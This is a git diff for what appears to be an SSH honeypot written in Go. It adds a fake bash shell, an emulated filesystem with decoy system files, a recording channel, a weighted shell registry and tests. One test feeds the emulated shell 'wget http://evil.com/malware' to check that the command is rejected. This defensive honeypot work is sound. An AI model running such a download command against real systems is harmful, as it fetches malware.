t.Errorf("id output = %q, want uid=0(root)", r.output)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdUnameBasic(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "uname")
|
||||
if r.output != "Linux" {
|
||||
t.Errorf("uname = %q, want %q", r.output, "Linux")
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdUnameAll(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "uname -a")
|
||||
if !strings.HasPrefix(r.output, "Linux testhost") {
|
||||
t.Errorf("uname -a = %q, want prefix 'Linux testhost'", r.output)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdLs(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "ls")
|
||||
if r.output == "" {
|
||||
t.Error("ls should return non-empty output")
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdLsPath(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "ls /etc")
|
||||
if !strings.Contains(r.output, "passwd") {
|
||||
t.Errorf("ls /etc = %q, should contain 'passwd'", r.output)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdLsNonexistent(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "ls /nope")
|
||||
if !strings.Contains(r.output, "No such file") {
|
||||
t.Errorf("ls /nope = %q, should contain 'No such file'", r.output)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdCd(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "cd /tmp")
|
||||
if r.output != "" {
|
||||
t.Errorf("cd /tmp should produce no output, got %q", r.output)
|
||||
}
|
||||
if state.cwd != "/tmp" {
|
||||
t.Errorf("cwd = %q, want %q", state.cwd, "/tmp")
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdCdNonexistent(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "cd /nope")
|
||||
if !strings.Contains(r.output, "No such file") {
|
||||
t.Errorf("cd /nope = %q, should contain 'No such file'", r.output)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdCdNoArgs(t *testing.T) {
|
||||
state := newTestState()
|
||||
state.cwd = "/tmp"
|
||||
dispatch(state, "cd")
|
||||
if state.cwd != "/root" {
|
||||
t.Errorf("cd with no args should go to /root, got %q", state.cwd)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdCdRelative(t *testing.T) {
|
||||
state := newTestState()
|
||||
state.cwd = "/var"
|
||||
dispatch(state, "cd log")
|
||||
if state.cwd != "/var/log" {
|
||||
t.Errorf("cwd = %q, want %q", state.cwd, "/var/log")
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdCdDotDot(t *testing.T) {
|
||||
state := newTestState()
|
||||
state.cwd = "/var/log"
|
||||
dispatch(state, "cd ..")
|
||||
if state.cwd != "/var" {
|
||||
t.Errorf("cwd = %q, want %q", state.cwd, "/var")
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdCat(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "cat /etc/hostname")
|
||||
if !strings.Contains(r.output, "testhost") {
|
||||
t.Errorf("cat /etc/hostname = %q, should contain 'testhost'", r.output)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdCatNonexistent(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "cat /nope")
|
||||
if !strings.Contains(r.output, "No such file") {
|
||||
t.Errorf("cat /nope = %q, should contain 'No such file'", r.output)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdCatDirectory(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "cat /etc")
|
||||
if !strings.Contains(r.output, "Is a directory") {
|
||||
t.Errorf("cat /etc = %q, should contain 'Is a directory'", r.output)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdCatMultiple(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "cat /etc/hostname /root/README.txt")
|
||||
if !strings.Contains(r.output, "testhost") || !strings.Contains(r.output, "DO NOT MODIFY") {
|
||||
t.Errorf("cat multiple files = %q, should contain both file contents", r.output)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdExit(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "exit")
|
||||
if !r.exit {
|
||||
t.Error("exit should set exit=true")
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdLogout(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "logout")
|
||||
if !r.exit {
|
||||
t.Error("logout should set exit=true")
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdNotFound(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "wget http://evil.com/malware")
|
||||
if !strings.Contains(r.output, "command not found") {
|
||||
t.Errorf("unknown cmd = %q, should contain 'command not found'", r.output)
|
||||
}
|
||||
if !strings.HasPrefix(r.output, "wget:") {
|
||||
t.Errorf("unknown cmd = %q, should start with 'wget:'", r.output)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdEmptyLine(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "")
|
||||
if r.output != "" || r.exit {
|
||||
t.Errorf("empty line should produce no output and not exit")
|
||||
}
|
||||
}
|
||||
166
internal/shell/bash/filesystem.go
Normal file
166
internal/shell/bash/filesystem.go
Normal file
@@ -0,0 +1,166 @@
|
||||
package bash
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"path"
|
||||
"strings"
|
||||
)
|
||||
|
||||
type fsNode struct {
|
||||
name string
|
||||
isDir bool
|
||||
content string
|
||||
children map[string]*fsNode
|
||||
}
|
||||
|
||||
type filesystem struct {
|
||||
root *fsNode
|
||||
}
|
||||
|
||||
func newFilesystem(hostname string) *filesystem {
|
||||
fs := &filesystem{
|
||||
root: &fsNode{name: "/", isDir: true, children: make(map[string]*fsNode)},
|
||||
}
|
||||
|
||||
fs.mkdirAll("/etc")
|
||||
fs.mkdirAll("/root")
|
||||
fs.mkdirAll("/home")
|
||||
fs.mkdirAll("/var/log")
|
||||
fs.mkdirAll("/tmp")
|
||||
fs.mkdirAll("/usr/bin")
|
||||
fs.mkdirAll("/usr/local")
|
||||
|
||||
fs.writeFile("/etc/passwd", "root:x:0:0:root:/root:/bin/bash\n"+
|
||||
"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"+
|
||||
"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"+
|
||||
"mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false\n")
|
||||
|
||||
fs.writeFile("/etc/hostname", hostname+"\n")
|
||||
|
||||
fs.writeFile("/etc/hosts", "127.0.0.1\tlocalhost\n"+
|
||||
"127.0.1.1\t"+hostname+"\n"+
|
||||
"::1\t\tlocalhost ip6-localhost ip6-loopback\n")
|
||||
|
||||
fs.writeFile("/root/.bash_history",
|
||||
"apt update\n"+
|
||||
"apt upgrade -y\n"+
|
||||
"systemctl restart nginx\n"+
|
||||
"tail -f /var/log/syslog\n"+
|
||||
"df -h\n"+
|
||||
"free -m\n"+
|
||||
"netstat -tlnp\n"+
|
||||
"cat /etc/passwd\n")
|
||||
|
||||
fs.writeFile("/root/.bashrc",
|
||||
"# ~/.bashrc: executed by bash(1) for non-login shells.\n"+
|
||||
"export PS1='\\u@\\h:\\w\\$ '\n"+
|
||||
"alias ll='ls -alF'\n"+
|
||||
"alias la='ls -A'\n")
|
||||
|
||||
fs.writeFile("/root/README.txt", "Production server - DO NOT MODIFY\n")
|
||||
|
||||
fs.writeFile("/var/log/syslog",
|
||||
"Jan 12 03:14:22 "+hostname+" systemd[1]: Started Daily apt download activities.\n"+
|
||||
"Jan 12 03:14:23 "+hostname+" systemd[1]: Started Daily Cleanup of Temporary Directories.\n"+
|
||||
"Jan 12 04:00:01 "+hostname+" CRON[12345]: (root) CMD (/usr/local/bin/backup.sh)\n"+
|
||||
"Jan 12 04:00:03 "+hostname+" kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.42 DST=10.0.0.5 PROTO=TCP DPT=22\n")
|
||||
|
||||
fs.writeFile("/tmp/notes.txt", "TODO: Update SSL certificates\n")
|
||||
|
||||
return fs
|
||||
}
|
||||
|
||||
// resolvePath converts a potentially relative path to an absolute one.
|
||||
func resolvePath(cwd, p string) string {
|
||||
if !strings.HasPrefix(p, "/") {
|
||||
p = cwd + "/" + p
|
||||
}
|
||||
return path.Clean(p)
|
||||
}
|
||||
|
||||
func (fs *filesystem) lookup(p string) *fsNode {
|
||||
p = path.Clean(p)
|
||||
if p == "/" {
|
||||
return fs.root
|
||||
}
|
||||
|
||||
parts := strings.Split(strings.TrimPrefix(p, "/"), "/")
|
||||
node := fs.root
|
||||
for _, part := range parts {
|
||||
if node.children == nil {
|
||||
return nil
|
||||
}
|
||||
child, ok := node.children[part]
|
||||
if !ok {
|
||||
return nil
|
||||
}
|
||||
node = child
|
||||
}
|
||||
return node
|
||||
}
|
||||
|
||||
func (fs *filesystem) exists(p string) bool {
|
||||
return fs.lookup(p) != nil
|
||||
}
|
||||
|
||||
func (fs *filesystem) isDirectory(p string) bool {
|
||||
n := fs.lookup(p)
|
||||
return n != nil && n.isDir
|
||||
}
|
||||
|
||||
func (fs *filesystem) list(p string) ([]string, error) {
|
||||
n := fs.lookup(p)
|
||||
if n == nil {
|
||||
return nil, fmt.Errorf("ls: cannot access '%s': No such file or directory", p)
|
||||
}
|
||||
if !n.isDir {
|
||||
return nil, fmt.Errorf("ls: cannot access '%s': Not a directory", p)
|
||||
}
|
||||
|
||||
names := make([]string, 0, len(n.children))
|
||||
for name, child := range n.children {
|
||||
if child.isDir {
|
||||
name += "/"
|
||||
}
|
||||
names = append(names, name)
|
||||
}
|
||||
return names, nil
|
||||
}
|
||||
|
||||
func (fs *filesystem) read(p string) (string, error) {
|
||||
n := fs.lookup(p)
|
||||
if n == nil {
|
||||
return "", fmt.Errorf("cat: %s: No such file or directory", p)
|
||||
}
|
||||
if n.isDir {
|
||||
return "", fmt.Errorf("cat: %s: Is a directory", p)
|
||||
}
|
||||
return n.content, nil
|
||||
}
|
||||
|
||||
func (fs *filesystem) mkdirAll(p string) {
|
||||
p = path.Clean(p)
|
||||
parts := strings.Split(strings.TrimPrefix(p, "/"), "/")
|
||||
node := fs.root
|
||||
for _, part := range parts {
|
||||
if node.children == nil {
|
||||
node.children = make(map[string]*fsNode)
|
||||
}
|
||||
child, ok := node.children[part]
|
||||
if !ok {
|
||||
child = &fsNode{name: part, isDir: true, children: make(map[string]*fsNode)}
|
||||
node.children[part] = child
|
||||
}
|
||||
node = child
|
||||
}
|
||||
}
|
||||
|
||||
func (fs *filesystem) writeFile(p string, content string) {
|
||||
p = path.Clean(p)
|
||||
dir := path.Dir(p)
|
||||
base := path.Base(p)
|
||||
|
||||
fs.mkdirAll(dir)
|
||||
parent := fs.lookup(dir)
|
||||
parent.children[base] = &fsNode{name: base, content: content}
|
||||
}
|
||||
140
internal/shell/bash/filesystem_test.go
Normal file
140
internal/shell/bash/filesystem_test.go
Normal file
@@ -0,0 +1,140 @@
|
||||
package bash
|
||||
|
||||
import (
|
||||
"sort"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestNewFilesystem(t *testing.T) {
|
||||
fs := newFilesystem("testhost")
|
||||
|
||||
// Standard directories should exist.
|
||||
for _, dir := range []string{"/etc", "/root", "/home", "/var/log", "/tmp", "/usr/bin"} {
|
||||
if !fs.isDirectory(dir) {
|
||||
t.Errorf("%s should be a directory", dir)
|
||||
}
|
||||
}
|
||||
|
||||
// Standard files should exist.
|
||||
for _, file := range []string{"/etc/passwd", "/etc/hostname", "/root/.bashrc", "/tmp/notes.txt"} {
|
||||
if !fs.exists(file) {
|
||||
t.Errorf("%s should exist", file)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestFilesystemHostname(t *testing.T) {
|
||||
fs := newFilesystem("myhost")
|
||||
content, err := fs.read("/etc/hostname")
|
||||
if err != nil {
|
||||
t.Fatalf("read /etc/hostname: %v", err)
|
||||
}
|
||||
if content != "myhost\n" {
|
||||
t.Errorf("hostname content = %q, want %q", content, "myhost\n")
|
||||
}
|
||||
}
|
||||
|
||||
func TestResolvePath(t *testing.T) {
|
||||
tests := []struct {
|
||||
cwd string
|
||||
arg string
|
||||
want string
|
||||
}{
|
||||
{"/root", "file.txt", "/root/file.txt"},
|
||||
{"/root", "/etc/passwd", "/etc/passwd"},
|
||||
{"/root", "..", "/"},
|
||||
{"/var/log", "../..", "/"},
|
||||
{"/root", ".", "/root"},
|
||||
{"/root", "./sub/file", "/root/sub/file"},
|
||||
{"/", "etc", "/etc"},
|
||||
}
|
||||
for _, tt := range tests {
|
||||
got := resolvePath(tt.cwd, tt.arg)
|
||||
if got != tt.want {
|
||||
t.Errorf("resolvePath(%q, %q) = %q, want %q", tt.cwd, tt.arg, got, tt.want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestFilesystemList(t *testing.T) {
|
||||
fs := newFilesystem("testhost")
|
||||
|
||||
names, err := fs.list("/etc")
|
||||
if err != nil {
|
||||
t.Fatalf("list /etc: %v", err)
|
||||
}
|
||||
sort.Strings(names)
|
||||
|
||||
// Should contain at least passwd, hostname, hosts.
|
||||
found := map[string]bool{}
|
||||
for _, n := range names {
|
||||
found[n] = true
|
||||
}
|
||||
for _, want := range []string{"passwd", "hostname", "hosts"} {
|
||||
if !found[want] {
|
||||
t.Errorf("list /etc missing %q, got %v", want, names)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestFilesystemListNonexistent(t *testing.T) {
|
||||
fs := newFilesystem("testhost")
|
||||
_, err := fs.list("/nonexistent")
|
||||
if err == nil {
|
||||
t.Fatal("expected error listing nonexistent directory")
|
||||
}
|
||||
}
|
||||
|
||||
func TestFilesystemListFile(t *testing.T) {
|
||||
fs := newFilesystem("testhost")
|
||||
_, err := fs.list("/etc/passwd")
|
||||
if err == nil {
|
||||
t.Fatal("expected error listing a file")
|
||||
}
|
||||
}
|
||||
|
||||
func TestFilesystemRead(t *testing.T) {
|
||||
fs := newFilesystem("testhost")
|
||||
content, err := fs.read("/etc/passwd")
|
||||
if err != nil {
|
||||
t.Fatalf("read: %v", err)
|
||||
}
|
||||
if content == "" {
|
||||
t.Error("expected non-empty content")
|
||||
}
|
||||
}
|
||||
|
||||
func TestFilesystemReadNonexistent(t *testing.T) {
|
||||
fs := newFilesystem("testhost")
|
||||
_, err := fs.read("/no/such/file")
|
||||
if err == nil {
|
||||
t.Fatal("expected error for nonexistent file")
|
||||
}
|
||||
}
|
||||
|
||||
func TestFilesystemReadDirectory(t *testing.T) {
|
||||
fs := newFilesystem("testhost")
|
||||
_, err := fs.read("/etc")
|
||||
if err == nil {
|
||||
t.Fatal("expected error for reading a directory")
|
||||
}
|
||||
}
|
||||
|
||||
func TestFilesystemDirectoryListing(t *testing.T) {
|
||||
fs := newFilesystem("testhost")
|
||||
names, err := fs.list("/")
|
||||
if err != nil {
|
||||
t.Fatalf("list /: %v", err)
|
||||
}
|
||||
|
||||
// Root directories should end with /
|
||||
found := map[string]bool{}
|
||||
for _, n := range names {
|
||||
found[n] = true
|
||||
}
|
||||
for _, want := range []string{"etc/", "root/", "home/", "var/", "tmp/", "usr/"} {
|
||||
if !found[want] {
|
||||
t.Errorf("list / missing %q, got %v", want, names)
|
||||
}
|
||||
}
|
||||
}
|
||||
19
internal/shell/recorder.go
Normal file
19
internal/shell/recorder.go
Normal file
@@ -0,0 +1,19 @@
|
||||
package shell
|
||||
|
||||
import "io"
|
||||
|
||||
// RecordingChannel wraps an io.ReadWriteCloser. In Phase 1.4 it is a
|
||||
// pass-through; Phase 2.3 will add byte-level keystroke recording here
|
||||
// without changing any shell code.
|
||||
type RecordingChannel struct {
|
||||
inner io.ReadWriteCloser
|
||||
}
|
||||
|
||||
// NewRecordingChannel returns a RecordingChannel wrapping rw.
|
||||
func NewRecordingChannel(rw io.ReadWriteCloser) *RecordingChannel {
|
||||
return &RecordingChannel{inner: rw}
|
||||
}
|
||||
|
||||
func (r *RecordingChannel) Read(p []byte) (int, error) { return r.inner.Read(p) }
|
||||
func (r *RecordingChannel) Write(p []byte) (int, error) { return r.inner.Write(p) }
|
||||
func (r *RecordingChannel) Close() error { return r.inner.Close() }
|
||||
43
internal/shell/recorder_test.go
Normal file
43
internal/shell/recorder_test.go
Normal file
@@ -0,0 +1,43 @@
|
||||
package shell
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"io"
|
||||
"testing"
|
||||
)
|
||||
|
||||
// nopCloser wraps a ReadWriter with a no-op Close.
|
||||
type nopCloser struct {
|
||||
io.ReadWriter
|
||||
}
|
||||
|
||||
func (nopCloser) Close() error { return nil }
|
||||
|
||||
func TestRecordingChannelPassthrough(t *testing.T) {
|
||||
var buf bytes.Buffer
|
||||
rc := NewRecordingChannel(nopCloser{&buf})
|
||||
|
||||
// Write through the recorder.
|
||||
msg := []byte("hello")
|
||||
n, err := rc.Write(msg)
|
||||
if err != nil {
|
||||
t.Fatalf("Write: %v", err)
|
||||
}
|
||||
if n != len(msg) {
|
||||
t.Errorf("Write n = %d, want %d", n, len(msg))
|
||||
}
|
||||
|
||||
// Read through the recorder.
|
||||
out := make([]byte, 16)
|
||||
n, err = rc.Read(out)
|
||||
if err != nil {
|
||||
t.Fatalf("Read: %v", err)
|
||||
}
|
||||
if string(out[:n]) != "hello" {
|
||||
t.Errorf("Read = %q, want %q", out[:n], "hello")
|
||||
}
|
||||
|
||||
if err := rc.Close(); err != nil {
|
||||
t.Fatalf("Close: %v", err)
|
||||
}
|
||||
}
|
||||
84
internal/shell/registry.go
Normal file
84
internal/shell/registry.go
Normal file
@@ -0,0 +1,84 @@
|
||||
package shell
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"fmt"
|
||||
"math/rand/v2"
|
||||
"sync"
|
||||
)
|
||||
|
||||
type registryEntry struct {
|
||||
shell Shell
|
||||
weight int
|
||||
}
|
||||
|
||||
// Registry holds shells with associated weights for random selection.
|
||||
type Registry struct {
|
||||
mu sync.RWMutex
|
||||
entries []registryEntry
|
||||
}
|
||||
|
||||
// NewRegistry returns an empty Registry.
|
||||
func NewRegistry() *Registry {
|
||||
return &Registry{}
|
||||
}
|
||||
|
||||
// Register adds a shell with the given weight. Weight must be >= 1 and
|
||||
// no duplicate names are allowed.
|
||||
func (r *Registry) Register(shell Shell, weight int) error {
|
||||
if weight < 1 {
|
||||
return fmt.Errorf("weight must be >= 1, got %d", weight)
|
||||
}
|
||||
|
||||
r.mu.Lock()
|
||||
defer r.mu.Unlock()
|
||||
|
||||
for _, e := range r.entries {
|
||||
if e.shell.Name() == shell.Name() {
|
||||
return fmt.Errorf("shell %q already registered", shell.Name())
|
||||
}
|
||||
}
|
||||
|
||||
r.entries = append(r.entries, registryEntry{shell: shell, weight: weight})
|
||||
return nil
|
||||
}
|
||||
|
||||
// Select picks a shell using weighted random selection.
|
||||
func (r *Registry) Select() (Shell, error) {
|
||||
r.mu.RLock()
|
||||
defer r.mu.RUnlock()
|
||||
|
||||
if len(r.entries) == 0 {
|
||||
return nil, errors.New("no shells registered")
|
||||
}
|
||||
|
||||
total := 0
|
||||
for _, e := range r.entries {
|
||||
total += e.weight
|
||||
}
|
||||
|
||||
pick := rand.IntN(total)
|
||||
cumulative := 0
|
||||
for _, e := range r.entries {
|
||||
cumulative += e.weight
|
||||
if pick < cumulative {
|
||||
return e.shell, nil
|
||||
}
|
||||
}
|
||||
|
||||
// Should never reach here, but return last entry as fallback.
|
||||
return r.entries[len(r.entries)-1].shell, nil
|
||||
}
|
||||
|
||||
// Get returns a shell by name.
|
||||
func (r *Registry) Get(name string) (Shell, bool) {
|
||||
r.mu.RLock()
|
||||
defer r.mu.RUnlock()
|
||||
|
||||
for _, e := range r.entries {
|
||||
if e.shell.Name() == name {
|
||||
return e.shell, true
|
||||
}
|
||||
}
|
||||
return nil, false
|
||||
}
|
||||
107
internal/shell/registry_test.go
Normal file
107
internal/shell/registry_test.go
Normal file
@@ -0,0 +1,107 @@
|
||||
package shell
|
||||
|
||||
import (
|
||||
"context"
|
||||
"io"
|
||||
"testing"
|
||||
)
|
||||
|
||||
// stubShell implements Shell for testing.
|
||||
type stubShell struct {
|
||||
name string
|
||||
}
|
||||
|
||||
func (s *stubShell) Name() string { return s.name }
|
||||
func (s *stubShell) Description() string { return "stub" }
|
||||
func (s *stubShell) Handle(_ context.Context, _ *SessionContext, _ io.ReadWriteCloser) error {
|
||||
return nil
|
||||
}
|
||||
|
||||
func TestRegistryRegisterAndGet(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
sh := &stubShell{name: "test"}
|
||||
|
||||
if err := r.Register(sh, 1); err != nil {
|
||||
t.Fatalf("Register: %v", err)
|
||||
}
|
||||
|
||||
got, ok := r.Get("test")
|
||||
if !ok {
|
||||
t.Fatal("Get returned false")
|
||||
}
|
||||
if got.Name() != "test" {
|
||||
t.Errorf("Name = %q, want %q", got.Name(), "test")
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegistryGetMissing(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
_, ok := r.Get("nope")
|
||||
if ok {
|
||||
t.Fatal("Get returned true for missing shell")
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegistryDuplicateName(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
r.Register(&stubShell{name: "dup"}, 1)
|
||||
err := r.Register(&stubShell{name: "dup"}, 1)
|
||||
if err == nil {
|
||||
t.Fatal("expected error for duplicate name")
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegistryInvalidWeight(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
err := r.Register(&stubShell{name: "a"}, 0)
|
||||
if err == nil {
|
||||
t.Fatal("expected error for weight 0")
|
||||
}
|
||||
err = r.Register(&stubShell{name: "b"}, -1)
|
||||
if err == nil {
|
||||
t.Fatal("expected error for negative weight")
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegistrySelectEmpty(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
_, err := r.Select()
|
||||
if err == nil {
|
||||
t.Fatal("expected error from empty registry")
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegistrySelectSingle(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
r.Register(&stubShell{name: "only"}, 1)
|
||||
|
||||
for range 10 {
|
||||
sh, err := r.Select()
|
||||
if err != nil {
|
||||
t.Fatalf("Select: %v", err)
|
||||
}
|
||||
if sh.Name() != "only" {
|
||||
t.Errorf("Name = %q, want %q", sh.Name(), "only")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegistrySelectWeighted(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
r.Register(&stubShell{name: "heavy"}, 100)
|
||||
r.Register(&stubShell{name: "light"}, 1)
|
||||
|
||||
counts := map[string]int{}
|
||||
for range 1000 {
|
||||
sh, err := r.Select()
|
||||
if err != nil {
|
||||
t.Fatalf("Select: %v", err)
|
||||
}
|
||||
counts[sh.Name()]++
|
||||
}
|
||||
|
||||
// "heavy" has weight 100 vs "light" weight 1, so heavy should get ~99%.
|
||||
if counts["heavy"] < 900 {
|
||||
t.Errorf("heavy selected %d/1000 times, expected >900", counts["heavy"])
|
||||
}
|
||||
}
|
||||
33
internal/shell/shell.go
Normal file
33
internal/shell/shell.go
Normal file
@@ -0,0 +1,33 @@
|
||||
package shell
|
||||
|
||||
import (
|
||||
"context"
|
||||
"io"
|
||||
|
||||
"git.t-juice.club/torjus/oubliette/internal/storage"
|
||||
)
|
||||
|
||||
// Shell is the interface that all honeypot shell implementations must satisfy.
|
||||
type Shell interface {
|
||||
Name() string
|
||||
Description() string
|
||||
Handle(ctx context.Context, sess *SessionContext, rw io.ReadWriteCloser) error
|
||||
}
|
||||
|
||||
// SessionContext carries metadata about the current SSH session.
|
||||
type SessionContext struct {
|
||||
SessionID string
|
||||
Username string
|
||||
RemoteAddr string
|
||||
ClientVersion string
|
||||
Store storage.Store
|
||||
ShellConfig map[string]any
|
||||
CommonConfig ShellCommonConfig
|
||||
}
|
||||
|
||||
// ShellCommonConfig holds settings shared across all shell types.
|
||||
type ShellCommonConfig struct {
|
||||
Hostname string
|
||||
Banner string
|
||||
FakeUser string // override username in prompt; empty = use authenticated user
|
||||
}
|
||||
Reference in New Issue
Block a user